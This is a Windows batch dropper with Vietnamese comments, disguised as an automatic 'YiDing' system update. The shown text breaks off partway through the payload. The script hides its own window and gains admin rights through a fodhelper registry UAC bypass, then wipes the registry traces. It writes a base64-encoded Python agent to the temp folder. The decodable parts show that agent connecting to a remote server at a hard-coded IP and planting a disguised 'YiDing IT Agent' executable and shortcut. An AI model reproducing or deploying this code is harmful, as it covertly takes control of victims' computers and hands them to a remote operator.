@echo off
:: [BẢN NÂNG CẤP HỆ THỐNG YIDING] - Vector Dropper (Mã kích hoạt vũ khí hủy diệt của Cypher)
:: (Dễ hiểu: File ngụy trang hoàn hảo dưới lớp vỏ "Bản cập nhật tự động YiDing". Chỉ cần 1 chạm, mọi rào cản sẽ sụp đổ)
setlocal ENABLEDELAYEDEXPANSION

:: Bùa ẩn thân: Trốn khỏi mắt thường bằng cách chạy ẩn toàn bộ cửa sổ dòng lệnh đen xì của Windows
if "%~1"=="h" goto begin
if exist "%temp%\h.vbs" del "%temp%\h.vbs"
echo CreateObject("Wscript.Shell").Run """" ^& WScript.Arguments(0) ^& """" ^& " h", 0, False > "%temp%\h.vbs"
wscript "%temp%\h.vbs" "%~dpnx0"
exit

:begin
:: 1. Kích hoạt cơ chế UAC Bypass - Tự phong tước vị tối cao (Admin) mà không hỏi ý kiến
net session >nul 2>&1
if %errorLevel% == 0 (
    goto :run_payload
) else (
    reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /t REG_SZ /d "" /f >nul 2>&1
    reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "cmd.exe /c \"\"%~dpnx0\" h\"" /f >nul 2>&1
    fodhelper.exe
    
    :: Chờ 2 giây để thuật thôi miên có tác dụng rồi lập tức xóa sạch vết chân Registry
    timeout /t 2 /nobreak >nul
    reg delete "HKCU\Software\Classes\ms-settings" /f >nul 2>&1
    exit
)

:run_payload
:: Bung vũ khí Vector: Ghi dữ liệu mã hóa Base64 vào vùng nhớ tạm thời trên ổ cứng của giám khảo
set "temp_py=%TEMP%\c_core.py"
echo import base64> "%temp_py%"
echo b64_str = "">> "%temp_py%"
echo b64_str += "aW1wb3J0IGFzeW5jaW8sIGpzb24sIGxvZ2dpbmcsIG9zLCBzeXMsIGJhc2U2NCwgc3VicHJvY2Vzcywgc29ja2V0CmltcG9ydCBw">> "%temp_py%"
echo b64_str += "c3V0aWwsIHdlYnNvY2tldHMKZnJvbSBwYXRobGliIGltcG9ydCBQYXRoCgojIEhv4bqhdCDEkeG7mW5nIHThu5F0IGNobyBj4bqj">> "%temp_py%"
echo b64_str += "IGFnZW50LnB5IChk4bqhbmcga+G7i2NoIGLhuqNuIGNo4bqheSB0cuG7sWMgdGnhur9wKSB2w6AgU3lzdGVtX0JyZWFrZXJfQWdl">> "%temp_py%"
echo b64_str += "bnQuZXhlIChk4bqhbmcgdOG7h3AgdGjhu7FjIHRoaSDEkcOzbmcgZ8OzaSkKQkFTRV9ESVIgPSBQYXRoKHN5cy5leGVjdXRhYmxl">> "%temp_py%"
echo b64_str += "KS5wYXJlbnQgaWYgZ2V0YXR0cihzeXMsICdmcm96ZW4nLCBGYWxzZSkgZWxzZSBQYXRoKF9fZmlsZV9fKS5wYXJlbnQKCiMg8J+b">> "%temp_py%"
echo b64_str += "oe+4jyBbSOG7hiBUSOG7kE5HIEdISSBOSOG7miBMT0ddIC0gTmjhuq10IGvDvSBow6BuaCB0csOsbmggY+G7p2EgU3lzdGVtIEJy">> "%temp_py%"
echo b64_str += "ZWFrZXIKIyAoROG7hSBoaeG7g3U6IE3hu41pIGhv4bqhdCDEkeG7mW5nIHjDom0gbmjhuq1wLCBs4buHbmggdGhpIGjDoG5oIGhv">> "%temp_py%"
echo b64_str += "4bq3YyBs4buXaSBwaMOhdCBzaW5oIHPhur0gxJHGsOG7o2MgZ2hpIGzhuqFpIMOibSB0aOG6p20gdsOgbyBmaWxlIGxvZyDEkeG7">> "%temp_py%"
echo b64_str += "gyBDeXBoZXIgdGhlbyBkw7VpIHbDoCB04buRaSDGsHUpCl9sb2dfaGFuZGxlcnMgPSBbbG9nZ2luZy5GaWxlSGFuZGxlcihCQVNF">> "%temp_py%"
echo b64_str += "X0RJUiAvICJhZ2VudC5sb2ciLCBlbmNvZGluZz0idXRmLTgiKV0KdHJ5OgogICAgaWYgc3lzLnN0ZG91dCBpcyBub3QgTm9uZToK">> "%temp_py%"
echo b64_str += "ICAgICAgICBzeXMuc3Rkb3V0LmZpbGVubygpCiAgICAgICAgX2xvZ19oYW5kbGVycy5hcHBlbmQobG9nZ2luZy5TdHJlYW1IYW5k">> "%temp_py%"
echo b64_str += "bGVyKCkpCmV4Y2VwdCBFeGNlcHRpb246CiAgICBwYXNzCmxvZ2dpbmcuYmFzaWNDb25maWcoCiAgICBsZXZlbD1sb2dnaW5nLklO">> "%temp_py%"
echo b64_str += "Rk8sCiAgICBmb3JtYXQ9IiUoYXNjdGltZSlzIFslKGxldmVsbmFtZSlzXSAlKG1lc3NhZ2UpcyIsCiAgICBoYW5kbGVycz1fbG9n">> "%temp_py%"
echo b64_str += "X2hhbmRsZXJzLAopCmxvZyA9IGxvZ2dpbmcuZ2V0TG9nZ2VyKF9fbmFtZV9fKQoKdHJ5OgogICAgaW1wb3J0IG1zczsgSEFTX01T">> "%temp_py%"
echo b64_str += "UyA9IFRydWUKZXhjZXB0IEltcG9ydEVycm9yOgogICAgSEFTX01TUyA9IEZhbHNlCgojIFRyw6FuaCBuaOG6rXAgdGjGsCB2aeG7">> "%temp_py%"
echo b64_str += "h24geOG7rSBsw70g4bqjbmggY3YyIOG7nyBuZ2/DoGkgY8O5bmcgxJHhu4Mga2jDtG5nIHThuqFvIHJhIHRp4bq/biB0csOsbmgg">> "%temp_py%"
echo b64_str += "Y29uIGtow7RuZyBj4bqnbiB0aGnhur90LiBDaOG7iSBuaOG6rXAga2hpIGfhu41pIGNhbWVyYSB0aOG7sWMgc+G7sS4KCiMg8J+T">> "%temp_py%"
echo b64_str += "oSBbTeG6oE5HIEzGr+G7mkkgVEjhuqZOIEtJTkhdIC0gQ+G7lW5nIGvhur90IG7hu5FpIHNpw6p1IGtow7RuZyBnaWFuIGPhu6dh">> "%temp_py%"
echo b64_str += "IEFnZW50IHbhu4EgTcOheSBDaOG7pwojIChE4buFIGhp4buDdTogQ+G6pXUgaMOsbmggxJHhu4thIGNo4buJIGPhu5VuZyBr4bq/">> "%temp_py%"
echo b64_str += "dCBu4buRaSBXZWJTb2NrZXQgxJHhur9uIFZQUyDEkWnhu4F1IHBo4buRaSB2w6AgxJHhurd0IGRhbmggdMOtbmggY2hvIGPhu5cg">> "%temp_py%"
echo b64_str += "bcOheSBuw6B5KQpWUFNfVVJMICAgPSAid3M6Ly80Ni4yMjUuMTYwLjI0Mzo5ODc2L2FnZW50IgpERVZJQ0VfSUQgPSBmIlBDLXtz">> "%temp_py%"
echo b64_str += "b2NrZXQuZ2V0aG9zdG5hbWUoKS51cHBlcigpfSIKCiMg8J+ToyBbVEhBTyBUw5pORyBUSMOUTkcgQsOBTyBXSU5ET1dTXSAtIEvh">> "%temp_py%"
echo b64_str += "u7kgdGh14bqtdCBj4bqleSBTaG9ydGN1dCBuZ+G7pXkgdHJhbmcgxJHhu5ljIHF1eeG7gW4KIyAoROG7hSBoaeG7g3U6IFdpbmRv">> "%temp_py%"
echo b64_str += "d3MgMTAvMTEgcuG6pXQga2jDsyB0w61uaCwgbXXhu5FuIGhp4buHbiB0aMO0bmcgYsOhbyBUb2FzdCBwaOG6o2kgY8OzIG3hu5l0">> "%temp_py%"
echo b64_str += "IFNob3J0Y3V0IFN0YXJ0IE1lbnUgxJHEg25nIGvDvSBBVU1JRCBjaHXhuqluLiAKIyBDeXBoZXIgxJHDoyB04buxIHZp4bq/dCB0">> "%temp_py%"
echo b64_str += "csOsbmggYmnDqm4gZOG7i2NoIEMjIHThuqFpIGNo4buXIMSR4buDIHThuqFvIGZpbGUgRVhFIG5n4buleSB0cmFuZyBj4buxYyDE">> "%temp_py%"
echo b64_str += "keG7iW5oIG5o4bqxbSBoaeG7g24gdGjhu4sgdGjDtG5nIGLDoW8gImNo4buNYyB04bupYyIgZ2nDoW0ga2jhuqNvKQpfYXVtaWRf">> "%temp_py%"
echo b64_str += "b2sgPSBGYWxzZQoKX0FVTUlEX0NTID0gciIiIgp1c2luZyBTeXN0ZW07IHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2">> "%temp_py%"
echo b64_str += "aWNlczsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkNvbVR5cGVzOwpwdWJsaWMgY2xhc3MgQXVtaWRIZWxw">> "%temp_py%"
echo b64_str += "ZXIgewogICAgW0d1aWQoIjAwMDIxNEY5LTAwMDAtMDAwMC1DMDAwLTAwMDAwMDAwMDA0NiIpLCBJbnRlcmZhY2VUeXBlKENvbUlu">> "%temp_py%"
echo b64_str += "dGVyZmFjZVR5cGUuSW50ZXJmYWNlSXNJVW5rbm93bildCiAgICBpbnRlcmZhY2UgSVNoZWxsTGluayB7CiAgICAgICAgdm9pZCBH">> "%temp_py%"
echo b64_str += "ZXRQYXRoKFtPdXQsTWFyc2hhbEFzKFVubWFuYWdlZFR5cGUuTFBXU3RyKV0gU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBmLCBp">> "%temp_py%"
echo b64_str += "bnQgYywgSW50UHRyIHAsIGludCBmbCk7CiAgICAgICAgdm9pZCBHZXRJRExpc3Qob3V0IEludFB0ciBwKTsgdm9pZCBTZXRJRExp">> "%temp_py%"
echo b64_str += "c3QoSW50UHRyIHApOwogICAgICAgIHZvaWQgR2V0RGVzY3JpcHRpb24oW091dCxNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5MUFdT">> "%temp_py%"
echo b64_str += "dHIpXSBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyIHMsIGludCBjKTsKICAgICAgICB2b2lkIFNldERlc2NyaXB0aW9uKFtNYXJz">> "%temp_py%"
echo b64_str += "aGFsQXMoVW5tYW5hZ2VkVHlwZS5MUFdTdHIpXSBzdHJpbmcgcyk7CiAgICAgICAgdm9pZCBHZXRXb3JraW5nRGlyZWN0b3J5KFtP">> "%temp_py%"
echo b64_str += "dXQsTWFyc2hhbEFzKFVubWFuYWdlZFR5cGUuTFBXU3RyKV0gU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBzLCBpbnQgYyk7CiAg">> "%temp_py%"
echo b64_str += "ICAgICAgdm9pZCBTZXRXb3JraW5nRGlyZWN0b3J5KFtNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5MUFdTdHIpXSBzdHJpbmcgcyk7">> "%temp_py%"
echo b64_str += "CiAgICAgICAgdm9pZCBHZXRBcmd1bWVudHMoW091dCxNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5MUFdTdHIpXSBTeXN0ZW0uVGV4">> "%temp_py%"
echo b64_str += "dC5TdHJpbmdCdWlsZGVyIHMsIGludCBjKTsKICAgICAgICB2b2lkIFNldEFyZ3VtZW50cyhbTWFyc2hhbEFzKFVubWFuYWdlZFR5">> "%temp_py%"
echo b64_str += "cGUuTFBXU3RyKV0gc3RyaW5nIHMpOwogICAgICAgIHZvaWQgR2V0SG90a2V5KG91dCBzaG9ydCBoKTsgdm9pZCBTZXRIb3RrZXko">> "%temp_py%"
echo b64_str += "c2hvcnQgaCk7CiAgICAgICAgdm9pZCBHZXRTaG93Q21kKG91dCBpbnQgaSk7IHZvaWQgU2V0U2hvd0NtZChpbnQgaSk7CiAgICAg">> "%temp_py%"
echo b64_str += "ICAgdm9pZCBHZXRJY29uTG9jYXRpb24oW091dCxNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5MUFdTdHIpXSBTeXN0ZW0uVGV4dC5T">> "%temp_py%"
echo b64_str += "dHJpbmdCdWlsZGVyIHMsIGludCBjLCBvdXQgaW50IGkpOwogICAgICAgIHZvaWQgU2V0SWNvbkxvY2F0aW9uKFtNYXJzaGFsQXMo">> "%temp_py%"
echo b64_str += "VW5tYW5hZ2VkVHlwZS5MUFdTdHIpXSBzdHJpbmcgcywgaW50IGkpOwogICAgICAgIHZvaWQgU2V0UmVsYXRpdmVQYXRoKFtNYXJz">> "%temp_py%"
echo b64_str += "aGFsQXMoVW5tYW5hZ2VkVHlwZS5MUFdTdHIpXSBzdHJpbmcgcywgaW50IHIpOwogICAgICAgIHZvaWQgUmVzb2x2ZShJbnRQdHIg">> "%temp_py%"
echo b64_str += "aCwgaW50IGYpOwogICAgICAgIHZvaWQgU2V0UGF0aChbTWFyc2hhbEFzKFVubWFuYWdlZFR5cGUuTFBXU3RyKV0gc3RyaW5nIHMp">> "%temp_py%"
echo b64_str += "OwogICAgfQogICAgW0d1aWQoIjg4NkQ4RUVCLThDRjItNDQ0Ni04RDAyLUNEQkExREJEQ0Y5OSIpLCBJbnRlcmZhY2VUeXBlKENv">> "%temp_py%"
echo b64_str += "bUludGVyZmFjZVR5cGUuSW50ZXJmYWNlSXNJVW5rbm93bildCiAgICBpbnRlcmZhY2UgSVByb3BlcnR5U3RvcmUgewogICAgICAg">> "%temp_py%"
echo b64_str += "IGludCBHZXRDb3VudChvdXQgdWludCBjKTsgaW50IEdldEF0KHVpbnQgaSwgb3V0IFBLZXkgayk7CiAgICAgICAgaW50IEdldFZh">> "%temp_py%"
echo b64_str += "bHVlKHJlZiBQS2V5IGssIG91dCBQVmFyIHYpOyBpbnQgU2V0VmFsdWUocmVmIFBLZXkgaywgcmVmIFBWYXIgdik7IGludCBDb21t">> "%temp_py%"
echo b64_str += "aXQoKTsKICAgIH0KICAgIFtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsKV0gcHVibGljIHN0cnVjdCBQS2V5IHsg">> "%temp_py%"
echo b64_str += "cHVibGljIEd1aWQgZm10aWQ7IHB1YmxpYyB1aW50IHBpZDsgfQogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLkV4cGxpY2l0">> "%temp_py%"
echo b64_str += "LFNpemU9MTYpXSBwdWJsaWMgc3RydWN0IFBWYXIgeyBbRmllbGRPZmZzZXQoMCldcHVibGljIHVzaG9ydCB2dDsgW0ZpZWxkT2Zm">> "%temp_py%"
echo b64_str += "c2V0KDgpXXB1YmxpYyBJbnRQdHIgcDsgfQogICAgW0d1aWQoIjAwMDIxNDAxLTAwMDAtMDAwMC1DMDAwLTAwMDAwMDAwMDA0NiIp">> "%temp_py%"
echo b64_str += "LCBDbGFzc0ludGVyZmFjZShDbGFzc0ludGVyZmFjZVR5cGUuTm9uZSksIENvbUltcG9ydF0KICAgIGNsYXNzIFNoZWxsTGluayB7">> "%temp_py%"
echo b64_str += "fQogICAgcHVibGljIHN0YXRpYyBzdHJpbmcgU2V0TG5rQXBwSWQoc3RyaW5nIGxuaywgc3RyaW5nIGFwcElkKSB7CiAgICAgICAg">> "%temp_py%"
echo b64_str += "dHJ5IHsKICAgICAgICAgICAgdmFyIHNsPShJU2hlbGxMaW5rKW5ldyBTaGVsbExpbmsoKTsKICAgICAgICAgICAgdmFyIHBmPShJ">> "%temp_py%"
echo b64_str += "UGVyc2lzdEZpbGUpc2w7CiAgICAgICAgICAgIHBmLkxvYWQobG5rLCAyKTsKICAgICAgICAgICAgdmFyIHBzPShJUHJvcGVydHlT">> "%temp_py%"
echo b64_str += "dG9yZSlzbDsKICAgICAgICAgICAgdmFyIGs9bmV3IFBLZXl7Zm10aWQ9bmV3IEd1aWQoIjlGNEMyODU1LTlGNzktNEIzOS1BOEQw">> "%temp_py%"
echo b64_str += "LUUxRDQyREUxRDVGMyIpLHBpZD01fTsKICAgICAgICAgICAgdmFyIHY9bmV3IFBWYXJ7dnQ9MzEscD1NYXJzaGFsLlN0cmluZ1Rv">> "%temp_py%"
echo b64_str += "Q29UYXNrTWVtVW5pKGFwcElkKX07CiAgICAgICAgICAgIGludCBocj1wcy5TZXRWYWx1ZShyZWYgayxyZWYgdik7IE1hcnNoYWwu">> "%temp_py%"
echo b64_str += "RnJlZUNvVGFza01lbSh2LnApOwogICAgICAgICAgICBpZihociE9MCkgcmV0dXJuICJTZXRWYWx1ZSBocj0iK2hyOwogICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICBocj1wcy5Db21taXQoKTsgaWYoaHIhPTApIHJldHVybiAiQ29tbWl0IGhyPSIraHI7CiAgICAgICAgICAgIHBmLlNhdmUo">> "%temp_py%"
echo b64_str += "bG5rLHRydWUpOwogICAgICAgICAgICByZXR1cm4gIk9LIjsKICAgICAgICB9IGNhdGNoKEV4Y2VwdGlvbiBleCl7cmV0dXJuICJF">> "%temp_py%"
echo b64_str += "UlI6IitleC5NZXNzYWdlO30KICAgIH0KfQoiIiIKCmFzeW5jIGRlZiBfY29tcGlsZV9sYXVuY2hlcl9leGUoaWNvX3BhdGg6IFBh">> "%temp_py%"
echo b64_str += "dGgsIGV4ZV9vdXQ6IFBhdGgpOgogICAgIiIiVOG7sSDEkeG7mW5nIGJpw6puIGThu4tjaCB04buHcCBTeXN0ZW1fQnJlYWtlcl9B">> "%temp_py%"
echo b64_str += "Z2VudC5leGUgxJFpIGvDqG0gduG7m2kgYmnhu4N1IHTGsOG7o25nIExvZ28gWWlEaW5nIMSR4buDIG5n4buleSB0cmFuZyBjaHV5">> "%temp_py%"
echo b64_str += "w6puIG5naGnhu4dwLiIiIgogICAgY3NjX2NhbmRpZGF0ZXMgPSBbCiAgICAgICAgciJDOlxXaW5kb3dzXE1pY3Jvc29mdC5ORVRc">> "%temp_py%"
echo b64_str += "RnJhbWV3b3JrNjRcdjQuMC4zMDMxOVxjc2MuZXhlIiwKICAgICAgICByIkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdv">> "%temp_py%"
echo b64_str += "cmtcdjQuMC4zMDMxOVxjc2MuZXhlIiwKICAgIF0KICAgIGNzYyA9IG5leHQoKHAgZm9yIHAgaW4gY3NjX2NhbmRpZGF0ZXMgaWYg">> "%temp_py%"
echo b64_str += "UGF0aChwKS5leGlzdHMoKSksIE5vbmUpCiAgICBpZiBub3QgY3NjOgogICAgICAgIHJldHVybgogICAgY3NfY29kZSA9ICgKICAg">> "%temp_py%"
echo b64_str += "ICAgICAidXNpbmcgU3lzdGVtOyB1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7IHVzaW5nIFN5c3RlbS5JTztcbiIKICAgICAgICAi">> "%temp_py%"
echo b64_str += "Y2xhc3MgU3lzdGVtQnJlYWtlckFnZW50IHtcbiIKICAgICAgICAiICAgIFtTVEFUaHJlYWRdIHN0YXRpYyB2b2lkIE1haW4oKSB7">> "%temp_py%"
echo b64_str += "XG4iCiAgICAgICAgIiAgICAgICAgc3RyaW5nIGQgPSBQYXRoLkdldERpcmVjdG9yeU5hbWUoU3lzdGVtLlJlZmxlY3Rpb24uQXNz">> "%temp_py%"
echo b64_str += "ZW1ibHkuR2V0RXhlY3V0aW5nQXNzZW1ibHkoKS5Mb2NhdGlvbik7XG4iCiAgICAgICAgIiAgICAgICAgc3RyaW5nIHB5ID0gUGF0">> "%temp_py%"
echo b64_str += "aC5Db21iaW5lKGQsIFwidmVudlwiLCBcIlNjcmlwdHNcIiwgXCJweXRob253LmV4ZVwiKTtcbiIKICAgICAgICAiICAgICAgICBz">> "%temp_py%"
echo b64_str += "dHJpbmcgc2MgPSBQYXRoLkNvbWJpbmUoZCwgXCJTeXN0ZW1fQnJlYWtlcl9BZ2VudC5weVwiKTtcbiIKICAgICAgICAiICAgICAg">> "%temp_py%"
echo b64_str += "ICBpZiAoIUZpbGUuRXhpc3RzKHB5KSkgcmV0dXJuO1xuIgogICAgICAgICIgICAgICAgIFByb2Nlc3MuU3RhcnQobmV3IFByb2Nl">> "%temp_py%"
echo b64_str += "c3NTdGFydEluZm8ge1xuIgogICAgICAgICIgICAgICAgICAgICBGaWxlTmFtZSA9IHB5LCBBcmd1bWVudHMgPSBcIlxcXCJcIiAr">> "%temp_py%"
echo b64_str += "IHNjICsgXCJcXFwiXCIsXG4iCiAgICAgICAgIiAgICAgICAgICAgIFdvcmtpbmdEaXJlY3RvcnkgPSBkLCBVc2VTaGVsbEV4ZWN1">> "%temp_py%"
echo b64_str += "dGUgPSBmYWxzZSB9KTtcbiIKICAgICAgICAiICAgIH1cbiIKICAgICAgICAifVxuIgogICAgKQogICAgaW1wb3J0IHRlbXBmaWxl">> "%temp_py%"
echo b64_str += "CiAgICBmZCwgY3NfZmlsZSA9IHRlbXBmaWxlLm1rc3RlbXAoc3VmZml4PSIuY3MiKQogICAgdHJ5OgogICAgICAgIHdpdGggb3Mu">> "%temp_py%"
echo b64_str += "ZmRvcGVuKGZkLCAidyIpIGFzIGY6CiAgICAgICAgICAgIGYud3JpdGUoY3NfY29kZSkKICAgICAgICBjbWQgPSBbY3NjLCAiL3Rh">> "%temp_py%"
echo b64_str += "cmdldDp3aW5leGUiLCBmIi9vdXQ6e2V4ZV9vdXR9Il0KICAgICAgICBpZiBpY29fcGF0aC5leGlzdHMoKToKICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "Y21kLmFwcGVuZChmIi93aW4zMmljb246e2ljb19wYXRofSIpCiAgICAgICAgY21kLmFwcGVuZChjc19maWxlKQogICAgICAgIHNp">> "%temp_py%"
echo b64_str += "ID0gc3VicHJvY2Vzcy5TVEFSVFVQSU5GTygpCiAgICAgICAgc2kuZHdGbGFncyB8PSBzdWJwcm9jZXNzLlNUQVJURl9VU0VTSE9X">> "%temp_py%"
echo b64_str += "V0lORE9XCiAgICAgICAgc2kud1Nob3dXaW5kb3cgPSAwCiAgICAgICAgYXdhaXQgYXN5bmNpby50b190aHJlYWQoCiAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgIHN1YnByb2Nlc3MucnVuLCBjbWQsIGNhcHR1cmVfb3V0cHV0PVRydWUsIHRpbWVvdXQ9MzAsCiAgICAgICAgICAgIHN0YXJ0">> "%temp_py%"
echo b64_str += "dXBpbmZvPXNpLCBjcmVhdGlvbmZsYWdzPXN1YnByb2Nlc3MuQ1JFQVRFX05PX1dJTkRPVwogICAgICAgICkKICAgIGV4Y2VwdCBF">> "%temp_py%"
echo b64_str += "eGNlcHRpb246CiAgICAgICAgcGFzcwogICAgZmluYWxseToKICAgICAgICB0cnk6IFBhdGgoY3NfZmlsZSkudW5saW5rKCkKICAg">> "%temp_py%"
echo b64_str += "ICAgICBleGNlcHQgRXhjZXB0aW9uOiBwYXNzCgoKYXN5bmMgZGVmIF9lbnN1cmVfYXVtaWQoKToKICAgIGdsb2JhbCBfYXVtaWRf">> "%temp_py%"
echo b64_str += "b2sKICAgIGlmIF9hdW1pZF9vazoKICAgICAgICByZXR1cm4KCiAgICBpY29fcGF0aCA9IEJBU0VfRElSIC8gInlpZGluZ19sb2dv">> "%temp_py%"
echo b64_str += "LmljbyIKICAgIHBuZ19wYXRoID0gQkFTRV9ESVIgLyAieWlkaW5nX2xvZ28ucG5nIgoKICAgICMgVMOhaSB04bqhbyB04buHcCBi">> "%temp_py%"
echo b64_str += "aeG7g3UgdMaw4bujbmcgSUNPIHThu6sg4bqjbmggUE5HOiBjxINuIGzhu4EgdnXDtG5nLCB4w7NhIG7hu4FuIMSRZW4gxJHhu4Mg">> "%temp_py%"
echo b64_str += "aGnhu4NuIHRo4buLIMSR4bq5cCBt4bqvdAogICAgdHJ5OgogICAgICAgIHNyYyA9IHBuZ19wYXRoIGlmIHBuZ19wYXRoLmV4aXN0">> "%temp_py%"
echo b64_str += "cygpIGVsc2UgTm9uZQogICAgICAgIGlmIHNyYzoKICAgICAgICAgICAgZnJvbSBQSUwgaW1wb3J0IEltYWdlCiAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "IGltZyA9IEltYWdlLm9wZW4oc3JjKS5jb252ZXJ0KCJSR0JBIikKICAgICAgICAgICAgc2lkZSA9IG1heChpbWcud2lkdGgsIGlt">> "%temp_py%"
echo b64_str += "Zy5oZWlnaHQpCiAgICAgICAgICAgIHNxID0gSW1hZ2UubmV3KCJSR0JBIiwgKHNpZGUsIHNpZGUpLCAoMCwgMCwgMCwgMCkpCiAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgIHNxLnBhc3RlKGltZywgKChzaWRlIC0gaW1nLndpZHRoKSAvLyAyLCAoc2lkZSAtIGltZy5oZWlnaHQpIC8vIDIp">> "%temp_py%"
echo b64_str += "KQogICAgICAgICAgICAjIFJlbW92ZSBuZWFyLWJsYWNrIGJhY2tncm91bmQgcGl4ZWxzCiAgICAgICAgICAgIHBpeGVscyA9IGxp">> "%temp_py%"
echo b64_str += "c3Qoc3EuZ2V0ZGF0YSgpKQogICAgICAgICAgICBzcS5wdXRkYXRhKFsociwgZywgYiwgMCkgaWYgciArIGcgKyBiIDwgNjAgZWxz">> "%temp_py%"
echo b64_str += "ZSAociwgZywgYiwgYSkKICAgICAgICAgICAgICAgICAgICAgICAgZm9yIHIsIGcsIGIsIGEgaW4gcGl4ZWxzXSkKICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgc3Euc2F2ZShzdHIoaWNvX3BhdGgpLCBmb3JtYXQ9IklDTyIsCiAgICAgICAgICAgICAgICAgICAgc2l6ZXM9WygxNiwgMTYp">> "%temp_py%"
echo b64_str += "LCAoMzIsIDMyKSwgKDQ4LCA0OCksICg2NCwgNjQpLCAoMjU2LCAyNTYpXSkKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAg">> "%temp_py%"
echo b64_str += "cGFzcwoKICAgICMgQmnDqm4gZOG7i2NoIHThu4dwIEVYRSBjaOG6oXkgbmfhuqdtIMSRaSBrw6htIGJp4buDdSB0xrDhu6NuZwog">> "%temp_py%"
echo b64_str += "ICAgbGF1bmNoZXJfZXhlID0gQkFTRV9ESVIgLyAiU3lzdGVtX0JyZWFrZXJfQWdlbnQuZXhlIgogICAgaWYgbm90IGxhdW5jaGVy">> "%temp_py%"
echo b64_str += "X2V4ZS5leGlzdHMoKToKICAgICAgICBhd2FpdCBfY29tcGlsZV9sYXVuY2hlcl9leGUoaWNvX3BhdGgsIGxhdW5jaGVyX2V4ZSkK">> "%temp_py%"
echo b64_str += "CiAgICAjIFjDoWMgxJHhu4tuaCDEkcaw4budbmcgZOG6q24gY2jhuqF5IGNoxrDGoW5nIHRyw6xuaDogxq91IHRpw6puIHThu4dw">> "%temp_py%"
echo b64_str += "IEVYRSDEkcOjIGJpw6puIGThu4tjaCBuZ+G7pXkgdHJhbmcsIG7hur91IGtow7RuZyBjw7MgdGjDrCBkw7luZyBQeXRob253LmV4">> "%temp_py%"
echo b64_str += "ZSBjaOG6oXkgbmfhuqdtCiAgICBpZiBsYXVuY2hlcl9leGUuZXhpc3RzKCk6CiAgICAgICAgdGFyZ2V0ID0gc3RyKGxhdW5jaGVy">> "%temp_py%"
echo b64_str += "X2V4ZSkKICAgICAgICBpY29uX3BzID0gIiIKICAgICAgICBhcmdzX3BzID0gIiIKICAgIGVsc2U6CiAgICAgICAgdGFyZ2V0ID0g">> "%temp_py%"
echo b64_str += "c3RyKFBhdGgoc3lzLmV4ZWN1dGFibGUpKQogICAgICAgIGljb25fcHMgPSBmJyRzLkljb25Mb2NhdGlvbj0ie3N0cihpY29fcGF0">> "%temp_py%"
echo b64_str += "aCl9LDAiOycgaWYgaWNvX3BhdGguZXhpc3RzKCkgZWxzZSAiIgogICAgICAgIGFyZ3NfcHMgPSBmJyRzLkFyZ3VtZW50cz1cJ3tz">> "%temp_py%"
echo b64_str += "dHIoQkFTRV9ESVIgLyAiU3lzdGVtX0JyZWFrZXJfQWdlbnQucHkiKX1cJzsnCgogICAgc2NyaXB0ID0gZiIiIgpBZGQtVHlwZSAt">> "%temp_py%"
echo b64_str += "VHlwZURlZmluaXRpb24gQCcKe19BVU1JRF9DU30KJ0AgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUKCiRhcHBJZCAgID0g">> "%temp_py%"
echo b64_str += "J1lpRGluZy5JVEFnZW50JwokbG5rRGlyICA9IFtJTy5QYXRoXTo6Q29tYmluZSgkZW52OkFQUERBVEEsJ01pY3Jvc29mdFxcV2lu">> "%temp_py%"
echo b64_str += "ZG93c1xcU3RhcnQgTWVudVxcUHJvZ3JhbXMnKQokbG5rUGF0aCA9IFtJTy5QYXRoXTo6Q29tYmluZSgkbG5rRGlyLCdZaURpbmcg">> "%temp_py%"
echo b64_str += "SVQgQWdlbnQubG5rJykKaWYgKFRlc3QtUGF0aCAkbG5rUGF0aCkge3sgUmVtb3ZlLUl0ZW0gJGxua1BhdGggLUZvcmNlIH19Cgok">> "%temp_py%"
echo b64_str += "d3MgPSBOZXctT2JqZWN0IC1Db21PYmplY3QgV1NjcmlwdC5TaGVsbAokcyAgPSAkd3MuQ3JlYXRlU2hvcnRjdXQoJGxua1BhdGgp">> "%temp_py%"
echo b64_str += "CiRzLlRhcmdldFBhdGggICAgICA9ICd7dGFyZ2V0fScKJHMuV29ya2luZ0RpcmVjdG9yeT0gJ3tzdHIoQkFTRV9ESVIpfScKJHMu">> "%temp_py%"
echo b64_str += "RGVzY3JpcHRpb24gICAgID0gJ1lpRGluZyBJVCBBZ2VudCcKe2ljb25fcHN9CnthcmdzX3BzfQokcy5TYXZlKCkKCltBdW1pZEhl">> "%temp_py%"
echo b64_str += "bHBlcl06OlNldExua0FwcElkKCRsbmtQYXRoLCAkYXBwSWQpIHwgT3V0LU51bGwKCiRzaWcgPSAnW0RsbEltcG9ydCgic2hlbGwz">> "%temp_py%"
echo b64_str += "Mi5kbGwiKV1wdWJsaWMgc3RhdGljIGV4dGVybiB2b2lkIFNIQ2hhbmdlTm90aWZ5KGludCBlLGludCBmLEludFB0ciBhLEludFB0">> "%temp_py%"
echo b64_str += "ciBiKTsnCkFkZC1UeXBlIC1NZW1iZXJEZWZpbml0aW9uICRzaWcgLU5hbWUgV2luU2hlbGxOb3RpZnkgLU5hbWVzcGFjZSBXaW4z">> "%temp_py%"
